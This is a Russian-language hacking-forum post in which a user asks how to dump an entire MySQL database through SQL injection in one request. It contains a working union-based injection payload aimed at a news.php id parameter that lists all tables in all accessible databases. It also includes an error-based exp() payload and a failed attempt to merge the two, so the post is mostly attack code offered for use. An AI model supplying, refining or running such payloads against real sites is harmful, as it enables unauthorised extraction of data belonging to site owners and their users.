Старый 07.10.2016, 21:59   #1
trololoman96
 
Регистрация: 06.11.2011
Сообщений: 12
Репутация: 0
По умолчанию MySQL - дамп в один запрос

Ищу варианты оптимизации запросов для более быстро дампа базы через sqli.

Для обычных union based иньекцией нашелся отличный вариант

Код:
http://site.ru/news.php?id=-1 union select 1,2,(select (@)from ( select (@:=0x00),( select (@) from information_schema.tables where (@) in (@:=concat(@,'<br>',table_schema,'-->',table_name))))a),4,5
Выведет инфу по всем таблицам со всех доступных бд. Какие есть лимиты не знаю, но во время тестов на локалке удалось вывести ~5к записей.

Теперь ищу похожее для error based. Был найден такой пример

Код:
select exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))
По моим тестам ограничение на вывод в exp 460 симолов. Мне не удалось его переделать под себя, сделать запрос в нужную таблицу. Возможно ограничение вывода можно "обойти" с помощью функции mid(), но мне пока не удалось проверить из за того что плохо понимаю что там происходит)


Пробоавал подставить туда запрос из первого примера, но тогда в ошибке нет вывода.

Код:
select exp(~(  select*from(      select (@)from ( select (@:=0x00),( select (@) from information_schema.tables where (@) in (@:=concat(@,'<br>',table_schema,'-->',table_name))))a   )x))

Кто может помочь разобраться с этим ? Моих знаний sql не хватает.


Источники:
https://osandamalith.com/2015/07/15/error-based-sql-injection-using-exp/
http://mybasictricks.blogspot.com/2013/10/part-1-advanced-sql-injection-bypass.html
trololoman96 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot